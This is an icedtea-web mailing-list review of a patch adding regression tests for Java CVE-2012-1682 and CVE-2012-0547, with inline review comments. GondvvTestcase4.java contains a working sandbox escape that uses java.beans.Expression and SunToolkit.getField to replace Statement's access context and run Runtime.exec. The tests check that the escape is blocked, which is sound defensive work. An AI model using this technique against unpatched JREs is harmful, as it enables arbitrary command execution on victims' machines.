[rfc][icedtea-web] Reproducer of BeansStatement behaviour
Jiri Vanek
jvanek at redhat.com
Mon Dec 17 08:21:30 PST 2012
On 12/14/2012 09:58 PM, Adam Domurad wrote:
> On 12/13/2012 11:35 AM, Jiri Vanek wrote:
>> Ok for head?
>>
>> J.
>
> I'm assuming this is OK for the repo since this has been made public before. To be exact though this
> is testing a property of the JRE.
>
>> diff -r 855087771e7e
>> tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploit.html
>> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
>> +++ b/tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploit.html Mon Sep
>> 03 16:04:41 2012 +0200
>> @@ -0,0 +1,42 @@
>> +<!--
>> +
>> +This file is part of IcedTea.
>> +
>> +IcedTea is free software; you can redistribute it and/or modify
>> +it under the terms of the GNU General Public License as published by
>> +the Free Software Foundation; either version 2, or (at your option)
>> +any later version.
>> +
>> +IcedTea is distributed in the hope that it will be useful, but
>> +WITHOUT ANY WARRANTY; without even the implied warranty of
>> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
>> +General Public License for more details.
>> +
>> +You should have received a copy of the GNU General Public License
>> +along with IcedTea; see the file COPYING. If not, write to the
>> +Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
>> +02110-1301 USA.
>> +
>> +Linking this library statically or dynamically with other modules is
>> +making a combined work based on this library. Thus, the terms and
>> +conditions of the GNU General Public License cover the whole
>> +combination.
>> +
>> +As a special exception, the copyright holders of this library give you
>> +permission to link this library with independent modules to produce an
>> +executable, regardless of the license terms of these independent
>> +modules, and to copy and distribute the resulting executable under
>> +terms of your choice, provided that you also meet, for each linked
>> +independent module, the terms and conditions of the license of that
>> +module. An independent module is a module which is not derived from
>> +or based on this library. If you modify this library, you may extend
>> +this exception to your version of the library, but you are not
>> +obligated to do so. If you do not wish to do so, delete this
>> +exception statement from your version.
>> +
>> + -->
>> +<html><head></head><body bgcolor="blue">
>> +<p><applet code="GondvvMinimal2.class" archive="BeansStatementExploit.jar" codebase="."
>> width="100" height="20">
>> +</applet></p>
>> +</body>
>> +</html>
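Review bot: the applet element's `width="100" height="20"` does not match the `width="100" height="100"` declared in the applet JNLP of this same patch; both launch the same `GondvvMinimal2`, so keeping the sizes identical avoids exercising a different layout path in the browser run than in the javaws run. The empty `<head></head>` could also carry a `<title>` so the browser window is identifiable in the test logs.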
>> diff -r 855087771e7e
>> tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploitApplet.jnlp
>
> Maybe 'BeansStatementBreakSandbox' would be a bit clearer.
>
>> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
>> +++ b/tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploitApplet.jnlp
>> Mon Sep 03 16:04:41 2012 +0200
>> @@ -0,0 +1,61 @@
>> +<!--
>> +
>> +This file is part of IcedTea.
>> +
>> +IcedTea is free software; you can redistribute it and/or modify
>> +it under the terms of the GNU General Public License as published by
>> +the Free Software Foundation; either version 2, or (at your option)
>> +any later version.
>> +
>> +IcedTea is distributed in the hope that it will be useful, but
>> +WITHOUT ANY WARRANTY; without even the implied warranty of
>> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
>> +General Public License for more details.
>> +
>> +You should have received a copy of the GNU General Public License
>> +along with IcedTea; see the file COPYING. If not, write to the
>> +Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
>> +02110-1301 USA.
>> +
>> +Linking this library statically or dynamically with other modules is
>> +making a combined work based on this library. Thus, the terms and
>> +conditions of the GNU General Public License cover the whole
>> +combination.
>> +
>> +As a special exception, the copyright holders of this library give you
>> +permission to link this library with independent modules to produce an
>> +executable, regardless of the license terms of these independent
>> +modules, and to copy and distribute the resulting executable under
>> +terms of your choice, provided that you also meet, for each linked
>> +independent module, the terms and conditions of the license of that
>> +module. An independent module is a module which is not derived from
>> +or based on this library. If you modify this library, you may extend
>> +this exception to your version of the library, but you are not
>> +obligated to do so. If you do not wish to do so, delete this
>> +exception statement from your version.
>> +
>> + -->
>> +<?xml version="1.0" encoding="utf-8"?>
>> +<jnlp spec="1.0" href="BeansStatementExploitApplet.jnlp" codebase=".">
>> + <information>
>> + <title>BeansStatementExploitApplet</title>
>> + <vendor>IcedTea</vendor>
>> + <homepage href="http://icedtea.classpath.org/wiki/IcedTea-Web#Testing_IcedTea-Web"/>
>> + <description>BeansStatementExploitApplet</description>
>> + <offline/>
>> + </information>
>> + <resources>
>> + <j2se version="1.6+"/>
>> + <jar href="BeansStatementExploit.jar"/>
>> + </resources>
>> + <applet-desc
>> + documentBase="."
>> + name="BeansStatementExploitApplet"
>> + main-class="GondvvMinimal2"
>> + width="100"
>> + height="100">
>> + </applet-desc>
>> +</jnlp>
>> +
>> +
>> +</applet-desc>
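Review bot: the trailing `</applet-desc>` after `</jnlp>` is a stray close tag with no matching open element (the real `applet-desc` is already closed inside `<jnlp>`), so the file is not well-formed XML; drop the last three lines of the hunk. Note also that the `<?xml version="1.0" encoding="utf-8"?>` declaration follows the license comment, whereas XML requires the declaration to be the very first thing in the document; if the JNLP parser tolerates it, fine, but a strict XML parser will reject the file, so either remove the declaration or move the comment below it.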
>> diff -r 855087771e7e
>> tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploitWS.jnlp
>> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
>> +++ b/tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploitWS.jnlp Mon
>> Sep 03 16:04:41 2012 +0200
>> @@ -0,0 +1,56 @@
>> +<!--
>> +
>> +This file is part of IcedTea.
>> +
>> +IcedTea is free software; you can redistribute it and/or modify
>> +it under the terms of the GNU General Public License as published by
>> +the Free Software Foundation; either version 2, or (at your option)
>> +any later version.
>> +
>> +IcedTea is distributed in the hope that it will be useful, but
>> +WITHOUT ANY WARRANTY; without even the implied warranty of
>> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
>> +General Public License for more details.
>> +
>> +You should have received a copy of the GNU General Public License
>> +along with IcedTea; see the file COPYING. If not, write to the
>> +Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
>> +02110-1301 USA.
>> +
>> +Linking this library statically or dynamically with other modules is
>> +making a combined work based on this library. Thus, the terms and
>> +conditions of the GNU General Public License cover the whole
>> +combination.
>> +
>> +As a special exception, the copyright holders of this library give you
>> +permission to link this library with independent modules to produce an
>> +executable, regardless of the license terms of these independent
>> +modules, and to copy and distribute the resulting executable under
>> +terms of your choice, provided that you also meet, for each linked
>> +independent module, the terms and conditions of the license of that
>> +module. An independent module is a module which is not derived from
>> +or based on this library. If you modify this library, you may extend
>> +this exception to your version of the library, but you are not
>> +obligated to do so. If you do not wish to do so, delete this
>> +exception statement from your version.
>> +
>> + -->
>> +<?xml version="1.0" encoding="utf-8"?>
>> +<jnlp spec="1.0" href="BeansStatementExploitWS.jnlp" codebase=".">
>> + <information>
>> + <title>BeansStatementExploitWS</title>
>> + <vendor>IcedTea</vendor>
>> + <homepage href="http://icedtea.classpath.org/wiki/IcedTea-Web#Testing_IcedTea-Web"/>
>> + <description>BeansStatementExploitWS</description>
>> + <offline/>
>> + </information>
>> + <resources>
>> + <j2se version="1.6+"/>
>> + <jar href="BeansStatementExploit.jar"/>
>> + </resources>
>> + <application-desc main-class="GondvvTestcase4">
>> + </application-desc>
>> +</jnlp>
>> +
>> +
>> +</applet-desc>
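Review bot: same two problems as in the applet JNLP: a stray `</applet-desc>` after `</jnlp>` (this file has no applet-desc at all, it uses `<application-desc>`), which makes the XML ill-formed, and the `<?xml ...?>` declaration placed after the license comment instead of at the start of the file. Remove the trailing three lines and either drop or move the declaration.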
>> diff -r 855087771e7e tests/reproducers/simple/BeansStatementExploit/srcs/GondvvMinimal2.java
>> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
>> +++ b/tests/reproducers/simple/BeansStatementExploit/srcs/GondvvMinimal2.java Mon Sep 03 16:04:41
>> 2012 +0200
>> @@ -0,0 +1,49 @@
>> +/* GondvvMinimal2.java
>> +Copyright (C) 2011 Red Hat, Inc.
>> +
>> +This file is part of IcedTea.
>> +
>> +IcedTea is free software; you can redistribute it and/or
>> +modify it under the terms of the GNU General Public License as published by
>> +the Free Software Foundation, version 2.
>> +
>> +IcedTea is distributed in the hope that it will be useful,
>> +but WITHOUT ANY WARRANTY; without even the implied warranty of
>> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
>> +General Public License for more details.
>> +
>> +You should have received a copy of the GNU General Public License
>> +along with IcedTea; see the file COPYING. If not, write to
>> +the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
>> +02110-1301 USA.
>> +
>> +Linking this library statically or dynamically with other modules is
>> +making a combined work based on this library. Thus, the terms and
>> +conditions of the GNU General Public License cover the whole
>> +combination.
>> +
>> +As a special exception, the copyright holders of this library give you
>> +permission to link this library with independent modules to produce an
>> +executable, regardless of the license terms of these independent
>> +modules, and to copy and distribute the resulting executable under
>> +terms of your choice, provided that you also meet, for each linked
>> +independent module, the terms and conditions of the license of that
>> +module. An independent module is a module which is not derived from
>> +or based on this library. If you modify this library, you may extend
>> +this exception to your version of the library, but you are not
>> +obligated to do so. If you do not wish to do so, delete this
>> +exception statement from your version.
>> + */
>> +
>> +import java.applet.Applet;
>> +
>> +
>> +public class GondvvMinimal2 extends Applet {
>
> I understand why you chose this name, but I would prefer something more descriptive of the intent of
> the applet.
>
>> +
>> + @Override
>> + public void init() {
>> + GondvvTestcase4.main(new String[0]);
>> +
>> + }
>> +
>> +}
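Review bot: the header still reads `Copyright (C) 2011` although the diff header dates the file Sep 2012. Also, `init()` passes `new String[0]` to `GondvvTestcase4.main`, which immediately discards it by assigning `args = new String[]{"/bin/date"}`; factoring the test body into a static `run()` that both this applet and the WS `main` call would make the shared entry point explicit and remove the misleading argument.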
>> diff -r 855087771e7e tests/reproducers/simple/BeansStatementExploit/srcs/GondvvTestcase4.java
>> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
>> +++ b/tests/reproducers/simple/BeansStatementExploit/srcs/GondvvTestcase4.java Mon Sep 03
>> 16:04:41 2012 +0200
>> @@ -0,0 +1,181 @@
>> +/* GondvvTestcase4.java
>> +Copyright (C) 2011 Red Hat, Inc.
>> +
>> +This file is part of IcedTea.
>> +
>> +IcedTea is free software; you can redistribute it and/or
>> +modify it under the terms of the GNU General Public License as published by
>> +the Free Software Foundation, version 2.
>> +
>> +IcedTea is distributed in the hope that it will be useful,
>> +but WITHOUT ANY WARRANTY; without even the implied warranty of
>> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
>> +General Public License for more details.
>> +
>> +You should have received a copy of the GNU General Public License
>> +along with IcedTea; see the file COPYING. If not, write to
>> +the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
>> +02110-1301 USA.
>> +
>> +Linking this library statically or dynamically with other modules is
>> +making a combined work based on this library. Thus, the terms and
>> +conditions of the GNU General Public License cover the whole
>> +combination.
>> +
>> +As a special exception, the copyright holders of this library give you
>> +permission to link this library with independent modules to produce an
>> +executable, regardless of the license terms of these independent
>> +modules, and to copy and distribute the resulting executable under
>> +terms of your choice, provided that you also meet, for each linked
>> +independent module, the terms and conditions of the license of that
>> +module. An independent module is a module which is not derived from
>> +or based on this library. If you modify this library, you may extend
>> +this exception to your version of the library, but you are not
>> +obligated to do so. If you do not wish to do so, delete this
>> +exception statement from your version.
>> + */
>> +
>> +import java.beans.Statement;
>> +import java.beans.Expression;
>> +
>> +import java.lang.reflect.Field;
>> +import java.net.URL;
>> +import java.security.*;
>> +import java.security.cert.Certificate;
>> +import java.io.InputStreamReader;
>> +import java.io.BufferedReader;
>> +
>> +/**
>> + *
>> + * Summary for @
>> + * http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682
>> + * and
>> + * http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547
>> + */
>> +public class GondvvTestcase4 {
>> +
>> + public static int runproc(Process proc) throws Exception {
>> + BufferedReader cmdout = new BufferedReader(new InputStreamReader(proc.getInputStream()));
>> + String line;
>> + while ((line = cmdout.readLine()) != null) {
>> + System.out.println(line);
>> + }
>> + proc.waitFor();
>> + return proc.exitValue();
>> + }
>> +
>> + public static void runcommand_exploit(String cmd) throws Exception {
>> + Expression exec_ex = new Expression(Runtime.getRuntime(), "exec", new String[]{cmd});
>> +
>> + Permissions perms = new Permissions();
>> + perms.add(new AllPermission());
>> + ProtectionDomain protdomain = new ProtectionDomain(
>> + new CodeSource(new URL("file:///"), new Certificate[0]), perms);
>> + AccessControlContext acc = new AccessControlContext(new ProtectionDomain[]{protdomain});
>> +
>> + Expression tmp_ex = new Expression(Class.class, "forName", new
>> Object[]{"sun.awt.SunToolkit"});
>> + tmp_ex.execute();
>> + Class toolkit = (Class) tmp_ex.getValue();
>> +
>> + tmp_ex = new Expression(toolkit, "getField", new Object[]{Statement.class, "acc"});
>> + tmp_ex.execute();
>> + ((Field) tmp_ex.getValue()).set(exec_ex, acc);
>> + exec_ex.execute();
>> +
>> + runproc((Process) exec_ex.getValue());
>> + }
>> +
>> + public static void runcommand_direct(String cmd) throws Exception {
>> + runproc(Runtime.getRuntime().exec(cmd));
>> + }
>> +
>> + public static void main(String[] args) {
>> + System.out.println("Running GondvvTest");
>> + args = new String[]{"/bin/date"};
>> + try {
>> + System.out.println("Directly calling: Class.forName(\"sun.awt.SunToolkit\")");
>> +
>> + Object cl = Class.forName("sun.awt.SunToolkit");
>> + System.out.println("FAIL: " + cl.toString());
>> + } catch (AccessControlException e) {
>> + System.out.println("OK: got expected: " + e.toString());
>> + } catch (Exception e) {
>> + System.out.println("FAIL: unexpected exception: " + e.toString());
>> + e.printStackTrace();
>> + }
>
> Can you move the FAIL/OK checks into the testcase class possibly? I guess it's OK as it is, but if
> you can make the testcase do more checking and not just checking for FAIL it would be good.
>
>> + System.out.println();
>> +
>> +
>> + try {
>> + System.out.println("Calling: Expression(Class.class, \"forName\", new
>> String[]{\"sun.awt.SunToolkit\"})");
>> +
>> + Expression ex = new Expression(Class.class, "forName", new
>> String[]{"sun.awt.SunToolkit"});
>> + ex.execute();
>> + Object cl = ex.getValue();
>> + System.out.println("FAIL: " + cl.toString());
>> + System.out.println();
>> + System.out.println("Checking if SunToolkit class reference is usable");
>> + try {
>> + ex = new Expression(cl, "getField", new Object[]{Byte.class, "SIZE"});
>> + ex.execute();
>> + System.out.println("FAIL: " + ex.getValue().toString());
>> + } catch (NoSuchMethodException e) {
>> + System.out.println("INFO: " + e.toString());
>> + e.printStackTrace();
>> + } catch (Exception e) {
>> + System.out.println("FAIL: unexpected exception: " + e.toString());
>> + e.printStackTrace();
>> + }
>> +
>> + try {
>> + ex = new Expression(cl, "getField", new Object[]{Statement.class, "acc"});
>> + ex.execute();
>> + System.out.println("FAIL: " + ex.getValue().toString());
>> + } catch (NoSuchMethodException e) {
>> + System.out.println("INFO: " + e.toString());
>> + e.printStackTrace();
>> + } catch (Exception e) {
>> + System.out.println("FAIL: unexpected exception: " + e.toString());
>> + e.printStackTrace();
>> + }
>> + } catch (AccessControlException e) {
>> + System.out.println("OK: got expected: " + e.toString());
>> + } catch (Exception e) {
>> + System.out.println("FAIL: unexpected exception: " + e.toString());
>> + e.printStackTrace();
>> + }
>> + System.out.println();
>> +
>> + if (args.length == 0) {
>> + }
>
> ??
>
>> +
>> + try {
>> + System.out.println("Running command directly: " + args[0]);
>> + runcommand_direct(args[0]);
>> + System.out.println("FAIL: commnad was run");
>> + } catch (AccessControlException e) {
>> + System.out.println("OK: got expected: " + e.toString());
>> + } catch (Exception e) {
>> + System.out.println("FAIL: unexpected exception: " + e.toString());
>> + e.printStackTrace();
>> + }
>> + System.out.println();
>> +
>> + try {
>> + System.out.println("Running command using exploit: " + args[0]);
>> + runcommand_exploit(args[0]);
>> + System.out.println("FAIL: commnad was run");
>> + } catch (AccessControlException e) {
>> + System.out.println("OK: got expected: " + e.toString());
>> + } catch (NoSuchMethodException e) {
>> + System.out.println("FAIL: " + e.toString());
>> + e.printStackTrace();
>> + } catch (Exception e) {
>> + System.out.println("FAIL: unexpected exception: " + e.toString());
>> + e.printStackTrace();
>> + }
>> + System.out.println();
>
> Looks OK but again
>
>> +
>> +
>> + }
>> +}
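Review bot: the empty `if (args.length == 0) { }` block is dead code and can never be true anyway, because `args = new String[]{"/bin/date"};` overwrites the real arguments two lines into `main()`; either drop the reassignment and use the check to supply the default command, or drop the check. Two further points: the exploit path reports `NoSuchMethodException` as `FAIL:` while the earlier `getField` probes report the same exception as `INFO:`, so a JRE that closes the hole by removing `SunToolkit.getField` would be flagged as a sandbox escape even though no command ran; and `runproc` only drains `getInputStream()` and never closes the reader, which is harmless for `/bin/date` but a deadlock risk for a command that writes much to stderr. Also fix the typo `commnad` in the two FAIL strings and the unfinished javadoc line `Summary for @`.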
>> diff -r 855087771e7e
>> tests/reproducers/simple/BeansStatementExploit/testcases/BeansStatementExploitTests.java
>> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
>> +++ b/tests/reproducers/simple/BeansStatementExploit/testcases/BeansStatementExploitTests.java
>> Mon Sep 03 16:04:41 2012 +0200
>> @@ -0,0 +1,82 @@
>> +/* BeansStatementExploitTests.java
>> +Copyright (C) 2011 Red Hat, Inc.
>> +
>> +This file is part of IcedTea.
>> +
>> +IcedTea is free software; you can redistribute it and/or
>> +modify it under the terms of the GNU General Public License as published by
>> +the Free Software Foundation, version 2.
>> +
>> +IcedTea is distributed in the hope that it will be useful,
>> +but WITHOUT ANY WARRANTY; without even the implied warranty of
>> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
>> +General Public License for more details.
>> +
>> +You should have received a copy of the GNU General Public License
>> +along with IcedTea; see the file COPYING. If not, write to
>> +the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
>> +02110-1301 USA.
>> +
>> +Linking this library statically or dynamically with other modules is
>> +making a combined work based on this library. Thus, the terms and
>> +conditions of the GNU General Public License cover the whole
>> +combination.
>> +
>> +As a special exception, the copyright holders of this library give you
>> +permission to link this library with independent modules to produce an
>> +executable, regardless of the license terms of these independent
>> +modules, and to copy and distribute the resulting executable under
>> +terms of your choice, provided that you also meet, for each linked
>> +independent module, the terms and conditions of the license of that
>> +module. An independent module is a module which is not derived from
>> +or based on this library. If you modify this library, you may extend
>> +this exception to your version of the library, but you are not
>> +obligated to do so. If you do not wish to do so, delete this
>> +exception statement from your version.
>> + */
>> +
>> +import net.sourceforge.jnlp.ProcessResult;
>> +import net.sourceforge.jnlp.annotations.Bug;
>> +import net.sourceforge.jnlp.browsertesting.BrowserTest;
>> +import net.sourceforge.jnlp.browsertesting.Browsers;
>> +import net.sourceforge.jnlp.annotations.NeedsDisplay;
>> +import net.sourceforge.jnlp.annotations.TestInBrowsers;
>> +import org.junit.Assert;
>> +
>> +import org.junit.Test;
>> +
>> +public class BeansStatementExploitTests extends BrowserTest {
>> +
>> + @Test
>> + @NeedsDisplay
>> + @Bug(id={"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682",
>> "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547"})
>> + public void BeansStatementExploitTestWS() throws Exception {
>> + ProcessResult pr = server.executeJavawsHeadless(null, "/BeansStatementExploitWS.jnlp");
>> + evaluate(pr);
>> + }
>> +
>> + @Test
>> + @NeedsDisplay
>> + @Bug(id={"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682",
>> "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547"})
>> + public void BeansStatementExploitTesWsApplet() throws Exception {
>> + ProcessResult pr = server.executeJavawsHeadless(null, "/BeansStatementExploitApplet.jnlp");
>> + evaluate(pr);
>> + }
>> +
>> + @Test
>> + @TestInBrowsers(testIn = {Browsers.all})
>> + @NeedsDisplay
>> + @Bug(id={"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682",
>> "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547"})
>> + public void BeansStatementExploitTestApplet() throws Exception {
>> + ProcessResult pr = server.executeBrowser("/BeansStatementExploit.html");
>> + evaluate(pr);
>> + Assert.assertTrue(pr.wasTerminated);
>> + }
>> +
>> + private void evaluate(ProcessResult pr) {
>> + Assert.assertTrue("Output of reproducerwas empty => it was not run", (pr.stdout.length()
>> > 0));
>> + Assert.assertTrue("Output of reproducerwas have not contained 'Running GondvvTest' => it
>> was not run", (pr.stdout.contains("Running GondvvTest")));
>> + Assert.assertFalse("Output of reproducer contained FAIL, that means that exploit have
>> hacked your system", (pr.stdout.contains("FAIL:")));
>> +
>> + }
>> +}
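Review bot: `evaluate()` only proves that the reproducer started (`Running GondvvTest`) and that no `FAIL:` line appeared, so a run that died after the banner, before reaching `Running command using exploit:`, passes vacuously; assert that the last section's header (or each expected `OK: got expected:` line) is present as well. Also fix the method name `BeansStatementExploitTesWsApplet` (missing `t`) and the assertion messages `Output of reproducerwas empty` and `Output of reproducerwas have not contained` (e.g. `Output of reproducer was empty` / `did not contain`).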
>
> Looks OK, although this seems like something that is better placed in a JRE's test suite, not ITW's.
> I have no problems with it going in the repo, though.
>
> Happy hacking,
> -Adam
Thank you for the review. All except FAIL/OK fixed. And for those stdouts I would rather stay with it.
I have also added listeners to speed up closing...
J.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: openjdk-exploit3-reproducer3.diff
Type: text/x-patch
Size: 22176 bytes
Desc: not available
Url : http://mail.openjdk.java.net/pipermail/distro-pkg-dev/attachments/20121217/f4c26741/openjdk-exploit3-reproducer3.diff